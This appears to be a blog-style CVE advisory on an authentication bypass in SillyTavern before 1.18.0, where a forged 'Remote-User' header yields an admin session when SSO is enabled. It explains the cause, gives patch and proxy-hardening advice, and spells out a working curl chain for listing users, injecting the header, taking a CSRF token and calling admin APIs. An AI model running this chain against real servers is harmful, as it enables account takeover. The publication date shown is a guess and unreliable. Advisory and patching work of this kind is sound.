SillyTavern, SSO Header Injection, (critical)

Listen to this Post

How the vulnerability works: SillyTavern before 1.18.0 allows SSO via `Remote-User` (Authelia) or `X-Authentik-Username` (Authentik) headers. When `sso.autheliaAuth` or `sso.authentikAuth` is enabled, the `/login` endpoint calls `headerUserLogin()` which reads the header using request.get(header). Express does not distinguish between headers from a trusted proxy vs direct client injection. An attacker can send a crafted HTTP request with `Remote-User: admin` directly to the SillyTavern port. The function then creates an authenticated session without any password. Additionally, `/api/users/list` is publicly accessible (no authentication required) due to being registered before requireLoginMiddleware. This allows attackers to enumerate all usernames, including admin handles. With a valid handle, the attacker injects the header, receives a session cookie, obtains a CSRF token, and calls privileged admin APIs. The flaw exists because there is no IP allowlist or validation that the header originates from a trusted reverse proxy. The default configuration has SSO disabled, but if enabled, any network client that can reach the SillyTavern port can exploit this. The fix in 1.18.0 adds a configurable IP restriction, defaulting to loopback only.
Platform: SillyTavern
Version: before 1.18.0
Vulnerability: header injection auth bypass
Severity: critical
date: 2025-01-15 (based on context)

Prediction: already patched (1.18.0)

What Undercode Say:

Enumerate users
curl -s -X POST http://target:8000/api/users/list -H "Content-Type: application/json" -d '{}'
Inject Remote-User header to hijack admin session
curl -s -L -H "Remote-User: admin" -c session.txt http://target:8000/login
Get CSRF token
TOKEN=$(curl -s -b session.txt http://target:8000/csrf-token | jq -r '.token')
Call admin API
curl -s -X POST http://target:8000/api/users/admin/get -H "Content-Type: application/json" -H "X-CSRF-Token: $TOKEN" -b session.txt -d '{}'

Exploit:

Send `Remote-User: ` to `/login` endpoint. Receive authenticated session cookie. Access any authenticated endpoint.

Protection from this CVE:

Upgrade to SillyTavern 1.18.0 or later. Enable `sso.trustedProxyIPs` and restrict to loopback. Disable SSO if not used. Use reverse proxy with header stripping.

Impact:

Full account takeover. Attacker gains admin privileges, can modify system, access all data, and execute arbitrary actions as any user.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top